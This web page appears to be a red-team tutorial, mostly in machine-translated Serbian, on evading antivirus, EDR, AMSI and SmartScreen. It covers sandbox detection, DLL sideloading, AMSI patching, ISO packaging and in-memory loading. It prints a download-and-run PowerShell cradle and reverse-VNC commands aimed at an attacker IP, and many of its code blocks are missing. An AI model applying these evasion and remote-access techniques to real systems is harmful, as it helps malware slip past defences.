Antivirus (AV) Bypass
Last updated
Last updated
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ako ste zainteresovani za karijeru u hakovanju i da hakujete ono što se ne može hakovati - zapošljavamo! (potrebno je tečno pisano i govorno poljski).
Ovu stranicu je napisao @m2rc_p!
Trenutno, AV koriste različite metode za proveru da li je datoteka maliciozna ili ne, statičku detekciju, dinamičku analizu, i za naprednije EDR-ove, analizu ponašanja.
Statička detekcija se postiže označavanjem poznatih malicioznih stringova ili nizova bajtova u binarnom fajlu ili skripti, kao i ekstrakcijom informacija iz same datoteke (npr. opis datoteke, ime kompanije, digitalni potpisi, ikona, kontrolna suma, itd.). To znači da korišćenje poznatih javnih alata može lakše dovesti do otkrivanja, jer su verovatno analizirani i označeni kao maliciozni. Postoji nekoliko načina da se zaobiđe ovakva vrsta detekcije:
Enkripcija
Ako enkriptujete binarni fajl, neće biti načina za AV da detektuje vaš program, ali će vam biti potreban neki loader za dekripciju i pokretanje programa u memoriji.
Obfuskacija
Ponekad je sve što treba da uradite da promenite neke stringove u vašem binarnom fajlu ili skripti da biste prošli pored AV, ali ovo može biti dugotrajan zadatak u zavisnosti od onoga što pokušavate da obfuskate.
Prilagođeni alati
Ako razvijate svoje alate, neće biti poznatih loših potpisa, ali ovo zahteva mnogo vremena i truda.
Dobar način za proveru protiv Windows Defender statičke detekcije je ThreatCheck. U suštini deli datoteku na više segmenata i zatim traži od Defendera da skenira svaki pojedinačno, na ovaj način, može vam reći tačno koji su označeni stringovi ili bajtovi u vašem binarnom fajlu.
Toplo preporučujem da pogledate ovu YouTube plejlistu o praktičnom AV izbegavanju.
Dinamička analiza je kada AV pokreće vaš binarni fajl u sandbox-u i prati malicioznu aktivnost (npr. pokušaj dekripcije i čitanja lozinki iz vašeg pretraživača, izvođenje minidump-a na LSASS-u, itd.). Ovaj deo može biti malo teži za rad, ali evo nekoliko stvari koje možete učiniti da izbegnete sandbox-e.
Spavanje pre izvršenja U zavisnosti od toga kako je implementirano, može biti odličan način za zaobilaženje dinamičke analize AV-a. AV-ima je dat vrlo kratak vremenski period za skeniranje datoteka kako ne bi ometali rad korisnika, tako da korišćenje dugih spavanja može ometati analizu binarnih fajlova. Problem je u tome što mnogi AV-ovi sandbox-i mogu jednostavno preskočiti spavanje u zavisnosti od toga kako je implementirano.
Proveravanje resursa mašine Obično sandbox-i imaju vrlo malo resursa za rad (npr. < 2GB RAM), inače bi mogli usporiti korisničku mašinu. Takođe možete biti veoma kreativni ovde, na primer, proveravajući temperaturu CPU-a ili čak brzine ventilatora, ne mora sve biti implementirano u sandbox-u.
Provere specifične za mašinu Ako želite da ciljate korisnika čija je radna stanica pridružena "contoso.local" domenu, možete izvršiti proveru na domen mašine da vidite da li se poklapa sa onim što ste naveli, ako se ne poklapa, možete naterati svoj program da se zatvori.
Ispostavlja se da je ime računara Microsoft Defender-ovog sandbox-a HAL9TH, tako da možete proveriti ime računara u vašem malveru pre detonacije, ako se ime poklapa sa HAL9TH, to znači da ste unutar Defender-ovog sandbox-a, tako da možete naterati svoj program da se zatvori.
Neki drugi zaista dobri saveti od @mgeeky za borbu protiv sandbox-a
Kao što smo rekli ranije u ovom postu, javni alati će na kraju biti otkriveni, tako da biste trebali da se zapitate nešto:
Na primer, ako želite da dump-ujete LSASS, da li zaista morate koristiti mimikatz? Ili biste mogli koristiti neki drugi projekat koji je manje poznat i takođe dump-uje LSASS.
Pravi odgovor je verovatno potonji. Uzimajući mimikatz kao primer, verovatno je jedan od, ako ne i najviše označenih malver-a od strane AV-a i EDR-a, dok je projekat sam po sebi super cool, takođe je noćna mora raditi s njim da biste zaobišli AV, tako da jednostavno potražite alternative za ono što pokušavate da postignete.
Kada modifikujete svoje payload-e za izbegavanje, obavezno isključite automatsko slanje uzoraka u Defender-u, i molim vas, ozbiljno, NE ULAŽITE NA VIRUSTOTAL ako je vaš cilj postizanje izbegavanja na duže staze. Ako želite da proverite da li vaš payload biva otkriven od strane određenog AV-a, instalirajte ga na VM, pokušajte da isključite automatsko slanje uzoraka, i testirajte ga tamo dok ne budete zadovoljni rezultatom.
Kada god je to moguće, uvek prioritizujte korišćenje DLL-ova za izbegavanje, prema mom iskustvu, DLL datoteke su obično mnogo manje otkrivene i analizirane, tako da je to veoma jednostavan trik za korišćenje kako biste izbegli detekciju u nekim slučajevima (ako vaš payload ima neki način da se pokrene kao DLL naravno).
Kao što možemo videti na ovoj slici, DLL payload iz Havoc-a ima stopu detekcije od 4/26 na antiscan.me, dok EXE payload ima stopu detekcije od 7/26.
Sada ćemo pokazati neke trikove koje možete koristiti sa DLL datotekama da biste bili mnogo neprimetniji.
DLL Sideloading koristi prednost reda pretrage DLL-ova koji koristi loader tako što postavlja i aplikaciju žrtve i maliciozni payload zajedno.
Možete proveriti programe podložne DLL Sideloading-u koristeći Siofra i sledeći powershell skript:
Ova komanda će prikazati listu programa podložnih DLL hijackingu unutar "C:\Program Files\" i DLL datoteka koje pokušavaju da učitaju.
Toplo preporučujem da istražite DLL hijackable/sideloadable programe sami, ova tehnika je prilično suptilna kada se pravilno izvede, ali ako koristite javno poznate DLL sideloadable programe, lako možete biti uhvaćeni.
Samo postavljanje malicioznog DLL-a sa imenom koje program očekuje da učita, neće učitati vaš payload, jer program očekuje neke specifične funkcije unutar tog DLL-a, da bismo rešili ovaj problem, koristićemo drugu tehniku nazvanu DLL Proxying/Forwarding.
DLL Proxying prosleđuje pozive koje program pravi iz proxy (i malicioznog) DLL-a ka originalnom DLL-u, čime se očuvava funkcionalnost programa i omogućava izvršavanje vašeg payload-a.
Koristiću projekat SharpDLLProxy od @flangvik
Ovo su koraci koje sam pratio:
Poslednja komanda će nam dati 2 fajla: šablon izvorne DLL datoteke i originalnu preimenovanu DLL.
Ovo su rezultati:
I naš shellcode (kodiran sa SGN) i proxy DLL imaju stopu detekcije 0/26 na antiscan.me! To bih nazvao uspehom.
Preporučujem da pogledate S3cur3Th1sSh1t's twitch VOD o DLL Sideloadingu, kao i ippsecov video da biste saznali više o onome što smo detaljnije razgovarali.
Freeze je alat za payload za zaobilaženje EDR-a koristeći suspendovane procese, direktne syscalls i alternativne metode izvršenja
Možete koristiti Freeze da učitate i izvršite svoj shellcode na diskretan način.
Izbegavanje je samo igra mačke i miša, ono što danas funkcioniše može biti otkriveno sutra, tako da nikada ne oslanjajte se samo na jedan alat, ako je moguće, pokušajte da povežete više tehnika izbegavanja.
AMSI je stvoren da spreči "malver bez datoteka". U početku, AV-ovi su mogli da skeniraju samo datoteke na disku, tako da ako biste nekako mogli da izvršite payload-ove direktno u memoriji, AV nije mogao ništa da učini da to spreči, jer nije imao dovoljno uvida.
AMSI funkcija je integrisana u ove komponente Windows-a.
Kontrola korisničkog naloga, ili UAC (povećanje privilegija EXE, COM, MSI, ili ActiveX instalacije)
PowerShell (skripte, interaktivna upotreba i dinamička evaluacija koda)
Windows Script Host (wscript.exe i cscript.exe)
JavaScript i VBScript
Office VBA makroi
Omogućava antivirusnim rešenjima da ispituju ponašanje skripti izlažući sadržaj skripti u formi koja je i nekriptovana i neobfuskovana.
Pokretanje IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
će proizvesti sledeću upozorenje na Windows Defender-u.
Primetite kako dodaje amsi:
i zatim putanju do izvršne datoteke iz koje je skripta pokrenuta, u ovom slučaju, powershell.exe
Nismo spustili nijednu datoteku na disk, ali smo ipak uhvaćeni u memoriji zbog AMSI.
Postoji nekoliko načina da se zaobiđe AMSI:
Obfuskacija
Pošto AMSI uglavnom radi sa statičkim detekcijama, stoga, modifikovanje skripti koje pokušavate da učitate može biti dobar način za izbegavanje detekcije.
Međutim, AMSI ima sposobnost da neobfuskira skripte čak i ako imaju više slojeva, tako da obfuskacija može biti loša opcija u zavisnosti od načina na koji je urađena. Ovo čini izbegavanje ne tako jednostavnim. Ipak, ponekad, sve što treba da uradite je da promenite nekoliko imena promenljivih i bićete u redu, tako da zavisi koliko je nešto označeno.
AMSI zaobilaženje
Pošto je AMSI implementiran učitavanjem DLL-a u proces powershell (takođe cscript.exe, wscript.exe, itd.), moguće je lako manipulisati njime čak i kada se pokreće kao korisnik bez privilegija. Zbog ove greške u implementaciji AMSI, istraživači su pronašli više načina da izbegnu AMSI skeniranje.
Prisiljavanje na grešku
Prisiljavanje AMSI inicijalizacije da ne uspe (amsiInitFailed) rezultira time da se nijedno skeniranje neće pokrenuti za trenutni proces. Prvobitno je ovo otkrio Matt Graeber i Microsoft je razvio potpis da spreči širu upotrebu.
Sve što je bilo potrebno je jedna linija powershell koda da se AMSI učini neupotrebljivim za trenutni powershell proces. Ova linija je, naravno, označena od strane AMSI-a, tako da su potrebne neke modifikacije kako bi se ova tehnika koristila.
Evo modifikovanog AMSI bypass-a koji sam uzeo iz ovog Github Gist.
Keep in mind, that this will probably get flagged once this post comes out, so you should not publish any code if your plan is staying undetected.
Memory Patching
Ova tehnika je prvobitno otkrivena od strane @RastaMouse i uključuje pronalaženje adrese za funkciju "AmsiScanBuffer" u amsi.dll (odgovornu za skeniranje korisničkog unosa) i prepisivanje sa instrukcijama da vrati kod za E_INVALIDARG, na ovaj način, rezultat stvarnog skeniranja će vratiti 0, što se tumači kao čist rezultat.
Please read https://rastamouse.me/memory-patching-amsi-bypass/ for a more detailed explanation.
Postoji mnogo drugih tehnika koje se koriste za zaobilaženje AMSI sa powershell-om, pogledajte ovu stranicu i ovaj repo da biste saznali više o njima.
Ili ovaj skript koji će putem memorijskog patchinga patchovati svaki novi Powersh
Postoji nekoliko alata koji se mogu koristiti za obfuskaciju C# čistog koda, generisanje metaprogramskih šablona za kompajliranje binarnih datoteka ili obfuskaciju kompajliranih binarnih datoteka kao što su:
InvisibilityCloak: C# obfuscator
Obfuscator-LLVM: Cilj ovog projekta je da pruži open-source fork LLVM kompilacione suite sposobne da pruži povećanu sigurnost softvera kroz obfuskaciju koda i zaštitu od neovlašćenih izmena.
ADVobfuscator: ADVobfuscator pokazuje kako koristiti C++11/14
jezik za generisanje, u vreme kompajliranja, obfuskovanog koda bez korišćenja bilo kog spoljnog alata i bez modifikovanja kompajlera.
obfy: Dodaje sloj obfuskovanih operacija generisanih C++ metaprogramskim okvirom koji će otežati život osobi koja želi da provali aplikaciju.
Alcatraz: Alcatraz je x64 binarni obfuscator koji može obfuskovati razne različite pe datoteke uključujući: .exe, .dll, .sys
metame: Metame je jednostavan metamorfni kod motor za proizvoljne izvršne datoteke.
ropfuscator: ROPfuscator je okvir za obfuskaciju koda sa finim granicama za jezike podržane od strane LLVM koristeći ROP (programiranje orijentisano na povratak). ROPfuscator obfuskira program na nivou asemblera transformišući obične instrukcije u ROP lance, ometajući naše prirodno shvatanje normalnog toka kontrole.
Nimcrypt: Nimcrypt je .NET PE Crypter napisan u Nimu
inceptor: Inceptor može konvertovati postojeće EXE/DLL u shellcode i zatim ih učitati
Možda ste videli ovaj ekran kada ste preuzimali neke izvršne datoteke sa interneta i izvršavali ih.
Microsoft Defender SmartScreen je bezbednosni mehanizam namenjen zaštiti krajnjeg korisnika od pokretanja potencijalno zlonamernih aplikacija.
SmartScreen uglavnom funkcioniše na osnovu reputacije, što znači da će neobično preuzete aplikacije aktivirati SmartScreen, čime će upozoriti i sprečiti krajnjeg korisnika da izvrši datoteku (iako se datoteka i dalje može izvršiti klikom na Više informacija -> Pokreni u svakom slučaju).
MoTW (Mark of The Web) je NTFS Alternativni Podaci Stream sa imenom Zone.Identifier koji se automatski kreira prilikom preuzimanja datoteka sa interneta, zajedno sa URL-om sa kojeg je preuzeta.
Važno je napomenuti da izvršne datoteke potpisane pouzdanom potpisnom sertifikatom neće aktivirati SmartScreen.
Veoma efikasan način da sprečite da vaši payload-ovi dobiju Mark of The Web je da ih pakujete unutar nekog oblika kontejnera kao što je ISO. To se dešava zato što Mark-of-the-Web (MOTW) ne može biti primenjen na non NTFS volumene.
PackMyPayload je alat koji pakuje payload-ove u izlazne kontejnere kako bi izbegao Mark-of-the-Web.
Example usage:
Here is a demo for bypassing SmartScreen by packaging payloads inside ISO files using PackMyPayload
Učitavanje C# binarnih datoteka u memoriju je poznato već neko vreme i to je i dalje veoma dobar način za pokretanje vaših alata nakon eksploatacije bez da vas AV uhvati.
Pošto će se payload učitati direktno u memoriju bez dodirivanja diska, moraćemo da se brinemo samo o patchovanju AMSI tokom celog procesa.
Većina C2 okvira (sliver, Covenant, metasploit, CobaltStrike, Havoc, itd.) već pruža mogućnost izvršavanja C# assembly-a direktno u memoriji, ali postoje različiti načini za to:
Fork&Run
Ovo podrazumeva pokretanje novog žrtvenog procesa, injektovanje vašeg malicioznog koda nakon eksploatacije u taj novi proces, izvršavanje vašeg malicioznog koda i kada završite, ubijanje novog procesa. Ovo ima svoje prednosti i nedostatke. Prednost metode fork and run je što se izvršavanje dešava van našeg Beacon implant procesa. To znači da ako nešto u našoj akciji nakon eksploatacije pođe po zlu ili bude uhvaćeno, postoji mnogo veća šansa da naš implant preživi. Nedostatak je što imate veću šansu da budete uhvaćeni od strane Behavioral Detections.
Inline
Radi se o injektovanju malicioznog koda nakon eksploatacije u sopstveni proces. Na ovaj način, možete izbeći kreiranje novog procesa i njegovo skeniranje od strane AV, ali nedostatak je što ako nešto pođe po zlu sa izvršavanjem vašeg payload-a, postoji mnogo veća šansa da izgubite vaš beacon jer bi mogao da se sruši.
Ako želite da pročitate više o učitavanju C# assembly-a, molimo vas da pogledate ovaj članak https://securityintelligence.com/posts/net-execution-inlineexecute-assembly/ i njihov InlineExecute-Assembly BOF (https://github.com/xforcered/InlineExecute-Assembly)
Takođe možete učitati C# assembly-e iz PowerShell-a, pogledajte Invoke-SharpLoader i video S3cur3th1sSh1t-a.
Kao što je predloženo u https://github.com/deeexcee-io/LOI-Bins, moguće je izvršiti maliciozni kod koristeći druge jezike dajući kompromitovanoj mašini pristup okruženju interpretera instaliranom na SMB deljenju pod kontrolom napadača.
Dajući pristup Interpreter Binaries i okruženju na SMB deljenju možete izvršiti proizvoljan kod u ovim jezicima unutar memorije kompromitovane mašine.
Repozitorijum ukazuje: Defender i dalje skenira skripte, ali korišćenjem Go, Java, PHP itd. imamo više fleksibilnosti da zaobiđemo statične potpise. Testiranje sa nasumičnim neobfuskovanim reverse shell skriptama u ovim jezicima se pokazalo uspešnim.
Izbegavanje je veoma komplikovana tema, ponekad morate uzeti u obzir mnoge različite izvore telemetrije u samo jednom sistemu, tako da je prilično nemoguće ostati potpuno neotkriven u zrelim okruženjima.
Svako okruženje protiv kojeg se borite imaće svoje snage i slabosti.
Toplo vas savetujem da pogledate ovaj govor od @ATTL4S, kako biste stekli uvid u naprednije tehnike izbegavanja.
Ovo je takođe još jedan odličan govor od @mariuszbit o Izbegavanju u Dubini.
Možete koristiti ThreatCheck koji će ukloniti delove binarne datoteke dok ne otkrije koji deo Defender smatra malicioznim i podeliti ga sa vama. Drugi alat koji radi isto je avred sa otvorenom web stranicom koja nudi uslugu na https://avred.r00ted.ch/
Do Windows 10, svi Windows su dolazili sa Telnet serverom koji ste mogli instalirati (kao administrator) tako što ćete:
Napravite da se pokrene kada se sistem pokrene i izvršite ga sada:
Promenite telnet port (neprimetno) i onemogućite firewall:
Preuzmite ga sa: http://www.uvnc.com/downloads/ultravnc.html (želite bin preuzimanja, a ne instalaciju)
NA HOSTU: Izvršite winvnc.exe i konfigurišite server:
Omogućite opciju Disable TrayIcon
Postavite lozinku u VNC Password
Postavite lozinku u View-Only Password
Zatim, premestite binarni winvnc.exe i novokreirani fajl UltraVNC.ini unutar žrtve
Napadač treba da izvrši unutar svog hosta binarni vncviewer.exe -listen 5900
kako bi bio pripremljen da uhvati obrnutu VNC vezu. Zatim, unutar žrtve: Pokrenite winvnc daemon winvnc.exe -run
i izvršite winwnc.exe [-autoreconnect] -connect <attacker_ip>::5900
UPWARNING: Da biste održali neprimetnost, ne smete raditi nekoliko stvari
Ne pokrećite winvnc
ako već radi ili ćete aktivirati popup. proverite da li radi sa tasklist | findstr winvnc
Ne pokrećite winvnc
bez UltraVNC.ini
u istom direktorijumu ili će se otvoriti prozor za konfiguraciju
Ne pokrećite winvnc -h
za pomoć ili ćete aktivirati popup
Preuzmite ga sa: https://github.com/GreatSCT/GreatSCT
Unutar GreatSCT:
Sada pokrenite lister sa msfconsole -r file.rc
i izvršite xml payload sa:
Trenutni defender će vrlo brzo prekinuti proces.
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Kompajlirajte ga sa:
Koristite ga sa:
REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066
REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639
Automatsko preuzimanje i izvršavanje:
Lista C# obfuskatora: https://github.com/NotPrab/.NET-Obfuscator
Ako ste zainteresovani za karijeru u hakovanju i da hakujete nehakovano - zapošljavamo! (potrebno je tečno pisanje i govorenje poljskog).
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)